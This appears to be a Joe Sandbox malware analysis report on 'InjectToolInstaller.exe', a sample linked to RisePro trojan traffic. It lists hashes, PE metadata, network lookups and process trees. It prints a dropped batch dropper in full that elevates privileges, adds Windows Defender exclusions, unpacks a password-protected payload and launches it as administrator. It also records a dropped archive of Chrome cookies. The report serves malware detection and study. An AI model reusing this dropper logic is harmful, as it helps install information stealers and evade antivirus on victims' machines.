SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	799
Entropy (8bit):	5.429551920459379
Encrypted:	false
SSDEEP:	24:YDFjY/3n+ZO1BP1lvXuAOYZdXJOYZdxWQgat/gx6W:YDFwX+cBrR55J5dx+x9
MD5:	0F646D63D5C95424B08EC8AE6BFC2730
SHA1:	2B7380474B8AA0B222E982575E66CA5AAC14BC1E
SHA-256:	8BBF1A16FB62E5993D5B95E854FC17F364483571FF7F32A8F6737C8DBBEBBE26
SHA-512:	8AE36C86E0BFED668112554A4C869EBB027147612B5F8E39CB28304385747C67FE70EC01F27ECD2B9F8E25B569AD5FA6827FD375B103075A1144B648A1FC3E26
Malicious:	true
Preview:	@echo off..:LOOP..NET FILE > NUL 2>&1 \|\| POWERSHELL -ex Unrestricted -Command "Start-Process -Verb RunAs -FilePath '%ComSpec%' -ArgumentList '/c "%~fnx0" %*'" && EXIT /b && (..goto shell..) \|\| (..goto loop..)..:SHELL..if not "%minimized%"=="" goto :minimized..set minimized=true..start /min cmd /C "%~dpnx0"..goto :EOF..:minimized..rem..powershell.exe -command "Add-MpPreference -ExclusionPath "%USERPROFILE%\Appdata\Local" -Force"..powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "%USERPROFILE%\Appdata\Local" -Force"..ping 127.0.0.1 -n 3 >nul..ren %~dp0data.dat data.exe..%~dp0data.exe -p"hty6u57tfg" -d"%~dp0"..ren %~dp021.mp3 insta313tg.exe..echo createobject("shell.application").shellexecute "%~dp0insta313tg.exe",,,"runas",1 > runas.vbs & start /wait runas.vbs

Process:	C:\Users\user\AppData\Local\Temp\data.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	754000000
Entropy (8bit):	0.0749439234468759
Encrypted:	false
SSDEEP:
MD5:	B1B1351B0ACA52254ECA958402C093F6
SHA1:	54D9DFD1171B3E78AE5EAF24A88F02E805F30219
SHA-256:	5F9CCCC57134A5F3A581943153A2AB51F3EB5C44104DD72B578D706CC5C8AF32
SHA-512:	19AAA062CA9DD26547282897DEFB534ECFEC021F67ADB7E439D7A11AA51D661573084E008AD37E5CD6DFB3C9A435F8FE1F400E7EF986B52BD4664E8108CD4C68
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e..................3...........3.. ....4...@.. ........................5...........`...................................3.K.....4...............4..#....4...................................................... ............... ..H............text.....3.. ....3................. ..`.rsrc.........4.......3.............@..@.reloc........4.......4.............@..B..................3.....H........g..x.......P...,~...s+.............................................(.......(....*.0..'....... ........8........E'...f.......7... ...........=...].......................".......B...`.......................-...........p.......w...M.......................,...........L.......8a.....9.... $...8I.....~....`..... ....82.......o...... ....8.....8....8........ ....~,...{Y...9....& "...8....8.... ....8.... ..(... ....8...... .....a..Yffeeffeeffe..Ya.. ....8....8.... ....~,.

Process:	C:\Users\user\Desktop\InjectToolInstaller.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	799
Entropy (8bit):	5.429551920459379
Encrypted:	false
SSDEEP:	24:YDFjY/3n+ZO1BP1lvXuAOYZdXJOYZdxWQgat/gx6W:YDFwX+cBrR55J5dx+x9
MD5:	0F646D63D5C95424B08EC8AE6BFC2730
SHA1:	2B7380474B8AA0B222E982575E66CA5AAC14BC1E
SHA-256:	8BBF1A16FB62E5993D5B95E854FC17F364483571FF7F32A8F6737C8DBBEBBE26
SHA-512:	8AE36C86E0BFED668112554A4C869EBB027147612B5F8E39CB28304385747C67FE70EC01F27ECD2B9F8E25B569AD5FA6827FD375B103075A1144B648A1FC3E26
Malicious:	false
Preview:	@echo off..:LOOP..NET FILE > NUL 2>&1 \|\| POWERSHELL -ex Unrestricted -Command "Start-Process -Verb RunAs -FilePath '%ComSpec%' -ArgumentList '/c "%~fnx0" %*'" && EXIT /b && (..goto shell..) \|\| (..goto loop..)..:SHELL..if not "%minimized%"=="" goto :minimized..set minimized=true..start /min cmd /C "%~dpnx0"..goto :EOF..:minimized..rem..powershell.exe -command "Add-MpPreference -ExclusionPath "%USERPROFILE%\Appdata\Local" -Force"..powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "%USERPROFILE%\Appdata\Local" -Force"..ping 127.0.0.1 -n 3 >nul..ren %~dp0data.dat data.exe..%~dp0data.exe -p"hty6u57tfg" -d"%~dp0"..ren %~dp021.mp3 insta313tg.exe..echo createobject("shell.application").shellexecute "%~dp0insta313tg.exe",,,"runas",1 > runas.vbs & start /wait runas.vbs

Process:	C:\Users\user\AppData\Local\Temp\insta313tg.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1309185
Entropy (8bit):	7.998166748259506
Encrypted:	true
SSDEEP:	24576:WYCAHLMud4/sLsJOjcz1iZwxcd1zSyiFmi+ieTN7bK2OPHWsJmSue:W4rlUOjeiZmcnYpWB7bK2O/ki
MD5:	37698ED6FA78640D62848D560CEADE08
SHA1:	C1A669C504D5F6FDCD0AB86D07F21401CF36F6D2
SHA-256:	E9F4D46078E90D804560A3BB23D8CDCA8907E6D311868C5F4F7E09990C5CDDE4
SHA-512:	54DC696E5D730CD466747535166371A4CC1CF79814D1308CB7117952407B2EDB2A568B6D01D393678A6A9A49EC5D5A24555CB19948E84855D316DD0A5E33BA20
Malicious:	false
Preview:	PK.........X}X................Cookies\..PK.........X}X.>7.....^.......Cookies\Chrome_Default.txt.....h.Fk-./bb..)H..bN"....0..(.....kX...n{.{.{...G.^...I..x.O...'.&...i.:.....M.a./.E#.A.m..)......hW..+y.1.q.X.Gs.R7C}d.2......"..X.....T+.....B\...4.kkd......s6..p.&..g......~v.qA..>.......'F..f.,R...?J......jtam~2..@!.k.hS/3.x+.Zm..F.w[#cZD.W..v1.m....WC....\.K ,.....X.v.j..+hU.s.....>.;.....F..`Z....;..#l...q.s.]..'......6.c.....w...0..P'N.^.?.6_.Hq....<5{..fq.L.L@X.a..F...B"..4........Z..z......A.V.2.. !...@.....<..o.._....%Q...lY.Y\|......h.j./Y9.q.1.)..S).......)..D;....B_l..C5t......@.g.\..Q.1.C...(I.~....j}...}6..].$....\..w.= .5R...Y.R.Q...#.v..m.7..5O.9...i.d(.;..(p./(....I.K.[r...cm.H..x..bH..3.x.`J#..pC.t.......N.k..wxP..5.E...... ...}........{G.%.:GW..a`....D....4B.7...."%k"M!.....Y..!N...5_..?....E..l..6vI.>.+N.]S..al.2/5._..-...Kz&.ltA;Q..R..=n....E/.5...,q..;.IK.Z.Y.3c.v.8S\|..^g.5qF....\.oP.b.e.39......n.....9.`m..4.L.

Process:	C:\Windows\SysWOW64\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	331
Entropy (8bit):	4.92149009030101
Encrypted:	false
SSDEEP:	6:PzLSLzMRfmWxHLThx2LThx0sW26VY7FwAFeMmvVOIHJFxMVlmJHaVFEG1vv:PKMRJpTeT0sBSAFSkIrxMVlmJHaVzvv
MD5:	2E512EE24AAB186D09E9A1F9B72A0569
SHA1:	C5BA2E0C0338FFEE13ED1FB6DA0CC9C000824B0B
SHA-256:	DB41050CA723A06D95B73FFBE40B32DE941F5EE474F129B2B33E91C67B72674F
SHA-512:	6B4487A088155E34FE5C642E1C3D46F63CB2DDD9E4092809CE6F3BEEFDEF0D1F8AA67F8E733EDE70B07F467ED5BB6F07104EEA4C1E7AC7E1A502A772F56F7DE9
Malicious:	false
Preview:	..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.999630501747654
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	InjectToolInstaller.exe
File size:	57'739'400 bytes
MD5:	86daf2965a3ac93c7119b5eccbeca489
SHA1:	ac7b034df5b8e42dfaa21ee7cf6656664a7dcf02
SHA256:	358bdb901a68378a995c91b5d500c579851b1ced09c28060e03734f8b48c0c80
SHA512:	4ee21bb169bf5e424921622d1dfaeb1f133ae940b159432b360d49fd074981c03813a608b48bb7a02b4374ef126cdb1e616339876fc679f055507c76e63462f0
SSDEEP:	1572864:4c/XkMjob1KMX3qONcfpSJFGildX7gntiAIYvBD7VsRTd9qrq:z0Wob1qObJFGild7OlIYJPV6G
TLSH:	C0C733B56471D23BCD77663C04F5F53B85AC23B12978260FAB8C0B79AF760A82901779
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4..\4..\4..\.F2\?..\.F0\H..\.F1\,..\...] ..\...]...\...]'..\.%.\5..\.%.\?..\4..\...\...]9..\...]w..\..<\5..\4.T\6..\...]5..

Entrypoint:	0x42075f
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x58E570A4 [Wed Apr 5 22:33:08 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	632f939005ccaa4d7643b0a302c14333

Signature Valid:	false
Signature Issuer:	CN=Certum Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	10/31/2022 3:53:10 PM 10/31/2023 3:53:09 PM
Subject Chain	E=dimitry@freeplane.org, CN="Open Source Developer, Dimitry Polivaev", O=Open Source Developer, L=Munich, C=DE
Version:	3
Thumbprint MD5:	8F254D12333030452B3114F8B9F4208E
Thumbprint SHA-1:	D6BE02881A5F2530791AB03F7A18B1B1D3C9152C
Thumbprint SHA-256:	E2FD5160A7B60D5A17A40C44A2F58D35EE6F854A52321569A1B8F5951294E47E
Serial:	6D59D71C2A65BA86924D4B3787C85555

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6e21c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x75000	0x677d	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x370def8	0x2990
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7c000	0x4114	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x67930	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x67988	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5f000	0x340	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5d6ed	0x5d800	d14cfc797ee564c9e874bd1e67b0958e	False	0.4659560912433155	DOS executable (COM)	6.61384158163032	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x5f000	0x10460	0x10600	a93bfa618092a37619bf4c604c78e013	False	0.38114265267175573	data	4.798234301337709	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x70000	0x49a0	0x1600	b04a39a4e4059f8c3f5731dff8990467	False	0.21857244318181818	data	4.026995854464094	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x75000	0x677d	0x6800	c92b4477d1e81be64a04bbb12a2d23d3	False	0.9295372596153846	data	7.7585140472480285	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7c000	0x4114	0x4200	5d96cbae03ca64130eda99f8f5e1c631	False	0.7248461174242424	data	6.581134153914073	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x752b0	0x5c94	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9929535864978903
RT_DIALOG	0x7af44	0x122	data	English	United States	0.5896551724137931
RT_DIALOG	0x7b068	0xb8	data	English	United States	0.6684782608695652
RT_DIALOG	0x7b120	0xb8	data	English	United States	0.6684782608695652
RT_STRING	0x7b1d8	0x94	data	English	United States	0.668918918918919
RT_STRING	0x7b26c	0x34	data	English	United States	0.6538461538461539
RT_STRING	0x7b2a0	0x54	data	English	United States	0.6904761904761905
RT_STRING	0x7b2f4	0x34	data	English	United States	0.6538461538461539
RT_GROUP_ICON	0x7b328	0x14	data	English	United States	1.05
RT_VERSION	0x7b33c	0x2c4	data	English	United States	0.4901129943502825
RT_MANIFEST	0x7b600	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

DLL	Import
KERNEL32.dll	VirtualAlloc, VirtualFree, GetVersionExA, GetSystemDirectoryW, GetModuleHandleA, GetProcAddress, LoadLibraryExW, lstrcatW, lstrlenW, CloseHandle, GetLastError, InitializeCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventA, CreateSemaphoreA, AreFileApisANSI, MultiByteToWideChar, WideCharToMultiByte, FreeLibrary, GetModuleFileNameA, GetModuleFileNameW, LoadLibraryExA, LoadLibraryA, LoadLibraryW, LocalFree, FormatMessageA, FormatMessageW, SetCurrentDirectoryA, SetCurrentDirectoryW, GetCurrentDirectoryA, GetCurrentDirectoryW, CreateDirectoryA, CreateDirectoryW, CreateFileW, DeleteFileA, DeleteFileW, RemoveDirectoryA, RemoveDirectoryW, SetFileAttributesA, SetFileAttributesW, SetFileTime, GetTempPathW, SetLastError, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, GetSystemDirectoryA, GetWindowsDirectoryA, GetWindowsDirectoryW, GetModuleHandleW, GetTempPathA, MoveFileA, MoveFileW, FindClose, FindCloseChangeNotification, FindFirstChangeNotificationA, FindFirstChangeNotificationW, FindFirstFileA, FindFirstFileW, FindNextFileA, FindNextFileW, GetFileAttributesA, GetFileAttributesW, GetLogicalDriveStringsW, GetLogicalDriveStringsA, CreateFileA, GetFileSize, ReadFile, SetEndOfFile, SetFilePointer, WriteFile, CompareFileTime, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetStdHandle, GetFileInformationByHandle, WaitForMultipleObjects, Sleep, GetCommandLineW, CreateProcessA, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapSize, SetConsoleCtrlHandler, GetProcessHeap, GetStringTypeW, GetFileType, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetCPInfo, GetOEMCP, IsValidCodePage, DecodePointer, FindFirstFileExW, FindFirstFileExA, WaitForSingleObjectEx, OutputDebugStringW, OutputDebugStringA, HeapReAlloc, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, GetCurrentThread, HeapAlloc, HeapFree, GetACP, ExitProcess, GetModuleHandleExW, FreeLibraryAndExitThread, ResumeThread, ExitThread, CreateThread, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, InterlockedFlushSList, InterlockedPushEntrySList, EncodePointer, RaiseException, RtlUnwind, GetStartupInfoW, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, QueryPerformanceCounter, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent
USER32.dll	CharUpperA, ShowWindow, CharUpperW, DestroyWindow, LoadIconA, KillTimer, SetTimer, PostMessageA, InvalidateRect, GetDC, DrawTextW, EndDialog, MessageBoxW, CharPrevExA, GetWindowTextLengthW, GetWindowTextLengthA, GetWindowTextW, GetWindowTextA, SetWindowTextW, SetWindowTextA, CreateWindowExW, CreateWindowExA, RegisterClassW, RegisterClassA, SendMessageA, LoadStringW, LoadStringA, SystemParametersInfoA, MapDialogRect, SetWindowLongA, GetWindowLongA, ScreenToClient, GetWindowRect, GetDialogBaseUnits, GetDlgItem, DialogBoxParamW, DialogBoxParamA, CreateDialogParamW, CreateDialogParamA, MoveWindow, SendMessageW
SHELL32.dll	DragQueryFileW, DragFinish, DragQueryFileA, ShellExecuteExA, SHBrowseForFolderA, SHGetPathFromIDListA, SHGetMalloc
ole32.dll	CoInitialize, CoUninitialize
OLEAUT32.dll	VariantCopy, VariantClear, SysAllocStringLen, SysAllocString, SysStringLen

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/29/24-11:04:50.649369	TCP	2049060	ET TROJAN RisePro TCP Heartbeat Packet	49167	54151	192.168.2.22	116.203.183.140
03/29/24-11:04:50.835883	TCP	2046267	ET TROJAN [ANY.RUN] RisePro TCP (External IP)	54151	49167	116.203.183.140	192.168.2.22

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2024 11:04:51.374102116 CET	56475	53	192.168.2.22	8.8.8.8
Mar 29, 2024 11:04:51.473998070 CET	53	56475	8.8.8.8	192.168.2.22
Mar 29, 2024 11:04:51.575311899 CET	49384	53	192.168.2.22	8.8.8.8
Mar 29, 2024 11:04:51.675381899 CET	53	49384	8.8.8.8	192.168.2.22
Mar 29, 2024 11:04:52.230626106 CET	54842	53	192.168.2.22	8.8.8.8
Mar 29, 2024 11:04:52.339054108 CET	53	54842	8.8.8.8	192.168.2.22
Mar 29, 2024 11:04:52.341716051 CET	58105	53	192.168.2.22	8.8.8.8
Mar 29, 2024 11:04:52.450659037 CET	53	58105	8.8.8.8	192.168.2.22
Mar 29, 2024 11:04:59.285448074 CET	64928	53	192.168.2.22	8.8.8.8
Mar 29, 2024 11:04:59.399408102 CET	53	64928	8.8.8.8	192.168.2.22

Timestamp	Bytes transferred	Direction	Data
2024-03-29 10:04:52 UTC	238	OUT	GET /widget/demo/102.165.48.43 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: ipinfo.io
2024-03-29 10:04:52 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Fri, 29 Mar 2024 10:04:52 GMT content-type: application/json; charset=utf-8 Content-Length: 1021 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 1 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-03-29 10:04:52 UTC	738	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 2c 20 44 2e 43 2e 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 33 38 2e 38 39 35 31 2c 2d 37 37 2e 30 33 36 34 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 32 30 30 30 34 22 2c 0a 20 20 20 20 22 74 69 6d 65 Data Ascii: { "input": "102.165.48.43", "data": { "ip": "102.165.48.43", "city": "Washington", "region": "Washington, D.C.", "country": "US", "loc": "38.8951,-77.0364", "org": "AS174 Cogent Communications", "postal": "20004", "time
2024-03-29 10:04:52 UTC	283	IN	Data Raw: 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 47 72 6f 75 6e 64 20 46 6c 6f 6f 72 2c 20 34 20 56 69 63 74 6f 72 69 61 20 53 71 75 61 72 65 2c 20 53 74 20 41 6c 62 61 6e 73 2c 20 48 65 72 74 66 6f 72 64 73 68 69 72 65 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 47 42 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 69 70 78 6f 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 45 64 76 69 6e 61 73 20 52 61 63 6b 61 75 73 6b 61 73 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 31 30 32 2e 31 36 35 2e 30 2e 30 2f 31 38 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 74 65 6c 3a 2b Data Ascii: ": { "address": "Ground Floor, 4 Victoria Square, St Albans, Hertfordshire, London, United Kingdom", "country": "GB", "email": "abuse@ipxo.com", "name": "Edvinas Rackauskas", "network": "102.165.0.0/18", "phone": "tel:+

Timestamp	Bytes transferred	Direction	Data
2024-03-29 10:04:52 UTC	262	OUT	GET /demo/home.php?s=102.165.48.43 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: db-ip.com
2024-03-29 10:04:53 UTC	656	IN	HTTP/1.1 200 OK Date: Fri, 29 Mar 2024 10:04:53 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC47DE06:D2EA_93878F2E:0050_66069245_5D39FB9:4F34 x-iplb-instance: 59215 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=crsVf5xbTdz8wWPTyOB%2FynS14LwRONsHXf8Q5GGT1bnW8z%2BdKnieY0aQSVU5o5hYoNbA%2F1xWKSNSG8SsFjUoTE%2BzEFIpnuoUNMcbsYIWbn81YlL0xGs02c0u0A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86bf09cf8a9b2892-IAD alt-svc: h3=":443"; ma=86400
2024-03-29 10:04:53 UTC	85	IN	Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-03-29 10:04:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	11:03:44
Start date:	29/03/2024
Path:	C:\Users\user\Desktop\InjectToolInstaller.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\InjectToolInstaller.exe"
Imagebase:	0x13a0000
File size:	57'739'400 bytes
MD5 hash:	86DAF2965A3AC93C7119B5ECCBECA489
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	4
Start time:	11:04:07
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\installer.bat
Imagebase:	0x4aa30000
File size:	302'592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	6
Start time:	11:04:08
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\1.bat
Imagebase:	0x4aa30000
File size:	302'592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report InjectToolInstaller.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\04disoij.wpj.ps1

C:\Users\user\AppData\Local\Temp\1.bat

C:\Users\user\AppData\Local\Temp\21.mp3

C:\Users\user\AppData\Local\Temp\7zS48C4B291\1.bat

C:\Users\user\AppData\Local\Temp\7zS48C4B291\License.txt

C:\Users\user\AppData\Local\Temp\7zS48C4B291\audio\gl_birds - Copy.wav

C:\Users\user\AppData\Local\Temp\7zS48C4B291\audio\gl_birds.wav

C:\Users\user\AppData\Local\Temp\7zS48C4B291\audio\gl_drums - Copy.wav

C:\Users\user\AppData\Local\Temp\7zS48C4B291\audio\gl_drums.wav

C:\Users\user\AppData\Local\Temp\7zS48C4B291\audio\gl_piano - Copy.wav

C:\Users\user\AppData\Local\Temp\7zS48C4B291\audio\gl_piano.wav

C:\Users\user\AppData\Local\Temp\7zS48C4B291\audio\gl_sc09 - Copy.wav

Windows Analysis Report
InjectToolInstaller.exe

Target ID:	14
Start time:	11:04:10
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	NET FILE
Imagebase:	0x810000
File size:	46'080 bytes
MD5 hash:	B9A4DAC2192FD78CDA097BFA79F6E7B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	18
Start time:	11:04:12
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 2
Imagebase:	0xe20000
File size:	15'360 bytes
MD5 hash:	6242E3D67787CCBF4E06AD2982853144
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	20
Start time:	11:04:13
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 2
Imagebase:	0x7f0000
File size:	15'360 bytes
MD5 hash:	6242E3D67787CCBF4E06AD2982853144
Has elevated privileges:	true
Has administrator privileges:	true
